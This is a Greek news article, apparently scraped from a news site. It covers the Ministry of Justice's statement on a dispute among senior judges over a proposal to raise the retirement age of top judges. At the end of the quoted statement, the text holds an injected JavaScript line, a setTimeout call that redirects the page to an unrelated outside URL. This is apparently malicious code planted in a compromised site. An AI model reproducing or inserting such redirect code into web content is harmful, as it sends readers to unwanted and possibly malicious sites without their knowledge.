Υπ. Δικαιοσύνης: Να αφήσουν χωρίς τρομολαγνικές διατυπώσεις τη Δικαιοσύνη να εκτελεί το έργο της

0
8

 

Θέση λαμβάνει το υπουργείο Δικαιοσύνης στη διαμάχη που ξέσπασε ανάμεσα σε ανώτατους και ανώτερους δικαστικούς σχετικά με την πρόταση της προέδρου του Αρείου Πάγου Βασιλικής Θάνου για αύξηση των ορίων ηλικίας συνταξιοδότησης των ανώτατων δικαστικών.

Το υπουργείο Δικαιοσύνης σημειώνει χαρακτηριστικά πως «καμία μεταβολή, κανείς νεωτερισμός δε θα προχωρήσει εκτός του θεσμικού πλαισίου και της νομιμότητας«.

Αναλυτικά η ανακοίνωση του υπουργείου

«Πολιτικοί εξέφρασαν «το θεσμικό τους τρόμο» ύστερα από δήλωση του Προέδρου του Συμβουλίου της Επικρατείας. Ένωση Δικαστών και Εισαγγελέων σπεύδει να αναφερθεί σε «τρόμο» εξαιτίας της «ευκολίας και προχειρότητας με την οποία επιχειρείται η υπέρβαση του Συντάγματος» στο θέμα της ηλικίας αποχώρησης των δικαστών. Το τελευταίο μάλιστα πριν καν η κυβέρνηση σκεφθεί, μελετήσει ή διατυπώσει μια πρόθεση σχετική με την ουσία ή τους τρόπους του θέματος.

Το Υπουργείο Δικαιοσύνης Διαφάνειας και Ανθρωπίνων Δικαιωμάτων καθησυχάζει. Καμία δίκη προθέσεων και καμία αστυνομία σκέψης δεν εγγίζει την πραγματικότητα. Καμία μεταβολή, κανείς νεωτερισμός δε θα προχωρήσει εκτός του θεσμικού πλαισίου και της νομιμότητας.

Παρακαλούμε όσους μετέχουν στη νομική παιδεία και στην κοινωνική συζήτηση, να αφήσουν χωρίς τρομολαγνικές διατυπώσεις τη δικαιοσύνη να εκτελεί το σημαντικό της έργο». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here